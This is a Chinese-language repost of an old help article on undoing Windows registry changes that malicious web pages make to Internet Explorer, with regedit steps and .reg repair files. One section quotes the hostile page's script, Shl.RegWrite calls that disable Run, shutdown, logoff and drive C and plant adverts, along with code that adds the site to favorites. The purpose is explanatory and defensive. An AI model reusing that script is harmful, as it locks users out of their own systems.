被惡意網站擊中的解決辦法――注冊表使用全攻略之六
2020-10-31 15:48:21
供稿:網友
被惡意網站擊中的解決辦法――注冊表使用全攻略之六
一、注冊表被修改的原因及解決辦法
惡意網頁是含有有害代碼的ActiveX網頁文件,這些廣告信息的出現是因為瀏覽者的注冊表被惡意更改的結果。
1、IE默認連接首頁被修改
IE瀏覽器上方的標題欄被改成"歡迎訪問……網站"的樣式,受到更改的注冊表項目為:
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/Main/Start Page
HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Main/Start Page
通過修改"Start Page"的鍵值,達到修改IE默認連接首頁的目的
①在Windows啟動后,點擊"開始"→"運行"菜單,在"打開"欄中鍵入regedit,然后按"確定"鍵;
②展開注冊表到
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/Main下,
在右半部分窗口中找到串值"Start Page" ,將鍵值改為"about:blank"即可;
③同理,展開注冊表到
HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Main
在右半部分窗口中找到串值"Start Page",然后按②中所述方法處理。
④退出注冊表編輯器,重新啟動計算機,一切OK了!
特殊例子:當IE的起始頁變成了某些網址后,就算你通過選項設置修改好了,重啟以后又會變成他們的網址啦,十分的難纏。其實他們是在你機器里加了一個自運行程序,它會在系統啟動時將你的IE起始頁設成他們的網站。
解決辦法:運行注冊表編輯器regedit.exe,然后依次展開
HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current Version/Run主鍵,然后將其下的registry.exe子鍵刪除,然后刪除自運行程序c:/Program Files/registry.exe,最后從IE選項中重新設置起始頁就好了。
2、篡改IE的默認頁
有些IE被改了起始頁后,即使設置了"使用默認頁"仍然無效,這是因為IE起始頁的默認頁也被篡改啦。就是以下注冊表項被修改:
HKEY_LOCAL_MACHINE/Software/Microsoft/Internet Explorer/Main/Default_Page_URL
"Default_Page_URL"這個子鍵的鍵值即起始頁的默認頁。
解決辦法:
將"Default_Page_UR"鍵值中的那些篡改網站的網址改掉.
3、修改IE瀏覽器缺省主頁,并鎖定設置項,禁止用戶更改回來。
主要是修改了注冊表中IE設置的下面這些鍵值(DWORD值為1時為不可選):
[HKEY_CURRENT_USER/Software/Policies/Microsoft/Internet Explorer/Control Panel]
"Settings"=dword:1
[HKEY_CURRENT_USER/Software/Policies/Microsoft/Internet Explorer/Control Panel]
"Links"=dword:1
[HKEY_CURRENT_USER/Software/Policies/Microsoft/Internet Explorer/Control Panel]
"SecAddSites"=dword:1
解決辦法:將上面這些DWORD值改為"0"即可恢復功能。
4、IE的默認首頁灰色按扭不可選
由于HKEY_USERS/.DEFAULT/Software/Policies/Microsoft/Internet Explorer/Control Panel下的DWORD值"homepage"的鍵值被修改的緣故。原來的鍵值為"0",被修改為"1"(即為灰色不可選狀態)。
解決辦法:將"homepage"的鍵值改為"0"即可。
5、IE標題欄被修改
在系統默認狀態下,是由應用程序本身來提供標題欄的信息,但也允許用戶自行在上述注冊表項目中填加信息,而一些惡意的網站正是利用了這一點來得逞的:它們將串值Window Title下的鍵值改為其網站名或更多的廣告信息,從而達到改變瀏覽者IE標題欄的目的。
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/Main/Window Title
HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Main/Window Title
解決辦法:
①在Windows啟動后,點擊"開始"→"運行"菜單項,在"打開"欄中鍵入regedit,然后按"確定"鍵;
②展開注冊表到
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/Main下,在右半部分窗口中找到串值"Window Title" ,將該串值刪除即可,或將Window Title的鍵值改為"IE瀏覽器"等你喜歡的名字;
③同理,展開注冊表到
HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Main,按②中所述方法處理。
④退出注冊表編輯器,重新啟動計算機,運行IE,即可
6、IE右鍵菜單被修改
受到修改的注冊表項目為:
HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/MenuExt下被新建了網頁的廣告信息,并由此在IE右鍵菜單中出現!
解決辦法:打開注冊標編輯器,找到
HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/MenuExt,刪除相關的廣告條文,注意不要把下載軟件FlashGet和Netants也刪除掉,這兩個是正常的。
7、IE默認搜索引擎被修改
在IE瀏覽器的工具欄中有一個搜索引擎的工具按鈕,可以實現網絡搜索,被篡改后只要點擊那個搜索工具按鈕就會鏈接到那個篡改網站。出現這種現象的原因是以下注冊表被修改:
HKEY_LOCAL_MACHINE/Software/Microsoft/Internet Explorer/Search/CustomizeSearch
HKEY_LOCAL_MACHINE/Software/Microsoft/Internet Explorer/Search/SearchAssistant
解決辦法:
運行注冊表編輯器,展開上述子鍵,將"CustomizeSearch"和"SearchAssistant"的鍵值改為某個搜索引擎的網址即可。
8、系統啟動時彈出對話框
受到更改的注冊表項目為:
HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Winlogon在其下被建立了字符串"LegalNoticeCaption"和"LegalNoticeText",其中"LegalNoticeCaption"是提示框的標題,"LegalNoticeText"是提示框的文本內容。它們的存在,得我們每次登陸到Windwos桌面前都出現一個提示窗口,顯示那些網頁的廣告信息。
解決辦法:打開注冊表編輯器,找到
HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Winlogon主鍵,在右邊窗口中找到"LegalNoticeCaption"和"LegalNoticeText"這兩個字符串,刪除就可。
9、瀏覽網頁注冊表被禁用
這是由于注冊表
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/System下的DWORD值"DisableRegistryTools"被修改為"1"的緣故,將其鍵值恢復為"0"即可。
解決辦法:用記事本程序建立以REG為后綴名的文件,將下面這些內容復制在其中就可以了:
[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/System]
"DisableRegistryTools"=dword:00000000
10、瀏覽網頁開始菜單被修改
1)禁止"關閉系統" 2)禁止"運行"
3)禁止"注銷" 4)隱藏C盤--你的C盤找不到了!
5)禁止使用注冊表編輯器regedit 6)禁止使用DOS程序
7)使系統無法進入"實模式" 8)禁止運行任何程序
注:以下是該網頁修改受害者的注冊表項所用的招數
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion
//Policies//Explorer//NoRun", 01, "REG_BINARY");
注:使受害者系統沒有“運行”項,這樣用戶就不能通過注冊表編輯器來修改該有害網頁對系統注冊表的修改。
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion/Policies//Explorer//NoClose", 01, "REG_BINARY");
注:使受害者系統沒有“關閉系統”項
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion/Policies//Explorer//NoLogOff", 01, "REG_BINARY");
注:使受害者系統沒有“注銷”項
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion/Policies//Explorer//NoDrives", "00000004", "REG_DWORD");
注:使受害者系統沒有邏輯驅動器C
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion/Policies//WinOldApp// Disabled","REG_BINARY");
注:禁止運行所有的DOS應用程序;
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion/Policies/ /WinOldApp//NoRealMode","REG_BINARY");
注:使系統不能啟動到“實模式”(傳統的DOS模式)下;
又注:進入該網頁,它還會修改以下的注冊表項,使WINDOWS系統登錄時顯示一個登錄窗口(在MicroSoft網絡用戶登錄之前)
Shl.RegWrite ("HKLM//Software//Microsoft//Windows//CurrentVersion/Winlogon//LegalNoticeCaption", "嗚啦啦...");
注:這些代碼會使窗口的標題是“嗚啦啦…”
Shl.RegWrite ("HKLM//Software//Microsoft//Windows//CurrentVersion/Winlogon//LegalNoticeText", "《嗚啦啦...》
注:上面一行是會在窗口中顯示出來的文字
注:下面兩行代碼修改注冊表,使受害者所有的IE窗口都加上以下的標題:“嗚啦啦…”
Shl.RegWrite ("HKLM//Software//Microsoft//Internet Explorer//Main/Window Title", "嗚啦啦...");
Shl.RegWrite ("HKCU//Software//Microsoft//Internet Explorer//Main/Window Title", "嗚啦啦...");
注:到上面一行為止,完成了對受害者的注冊表的所有修改!
注:下面代碼用來將其網頁增加到受害者的收藏夾中
var WF, Shor, loc;
WF = FSO.GetSpecialFolder(0);
loc = WF + "http://Favorites";
if(!FSO.FolderExists(loc))
{
loc = FSO.GetDriveName(WF) + "http://Documents and Settings/" + Net.UserName + "http://Favorites";
if(!FSO.FolderExists(loc))
{
return;
}
}
注:下面就是使其網頁加入到你的收藏夾的具體代碼
AddFavLnk(loc, "找到感覺www.findfeel.com", "http://www.findfeel.com")
受害用戶的修復方法:
1:對于Win9x用戶,建議在電腦啟動時按F8鍵,選擇到MS-DOS方式下,使用Scanreg/restore命令來恢復以前備份的、正常的注冊表。
2:對于Win2000用戶,把以下內容copy下來,存為unlock.reg文件,選帶命令行的安全模式,用命令regedit unlock.reg導入,如何重啟機器就OK了。
unlock.reg文件內容如下:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersionPolicies/Explorer]
"NoDriveTypeAutoRun"=dword:00000095
"NoRun"=hex:
"NoLogOff"=hex:
"NoDrives"=dword:00000000
"RestrictRun"=dword:00000000
[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersionPolicies/System]
"DisableRegistryTools"=dword:00000000
[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersionPolicies/System]
"DisableRegistryTools"=dword:00000000
[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersionPolicies/WinOldApp]
"Disabled"=dword:00000000
[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersionPolicies/WinOldApp]
"NoRealMode"=dword:00000000
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersionWinlogon]
"LegalNoticeCaption"=""
"LegalNoticeText"=""
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/Main]
"Window Title"="IE瀏覽器"
[HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Main]
"Window Title"="IE瀏覽器"
11、IE中鼠標右鍵失效
瀏覽網頁后在IE中鼠標右鍵失效,點擊右鍵沒有任何反應!
12、查看""源文件"菜單被禁用
在IE窗口中點擊"查看"→"源文件","源文件"菜單已經被禁用。具體的位置為:在注冊表
HKEY_CURRENT_USER/Software/Policies/Microsoft/Internet Explorer下建子鍵"Restrictions",然后在"Restrictions"下面建立兩個DWORD值:"NoViewSource"和"NoBrowserContextMenu",并為這兩個DWORD值賦值為"1"。
在注冊表
HKEY_USERS/.DEFAULT/Software/Policies/Microsoft/Internet Explorer/Restrictions下,將兩個DWORD值:"NoViewSource"和"NoBrowserContextMenu"的鍵值都改為了"1"。
解決辦法:
將以下內容另存為后綴名為reg的注冊表文件,如unlock.reg,雙擊unlock.reg導入注冊表,重新運行IE就會恢復正常。
[HKEY_CURRENT_USER/Software/Policies/Microsoft/Internet Explorer/Restrictions]
"NoViewSource"=dword:00000000
"NoBrowserContextMenu"=dword:00000000
[HKEY_USERS/.DEFAULT/Software/Policies/Microsoft/Internet Explorer/Restrictions]
"NoViewSource"=dword:00000000
"NoBrowserContextMenu"=dword:00000000
要特別注意的是,在你編制的注冊表文件unlock.reg中,"REGEDIT4"一定要大寫,并且它的后面一定要空一行,還有,"REGEDIT4"中的"4"和"T"之間一定不能有空格,否則將前功盡棄!注意如果是Win2000或WinXP用戶,請將"REGEDIT4"改為Windows Registry Editor Version 5.00。
>
(出處:熱點網絡)
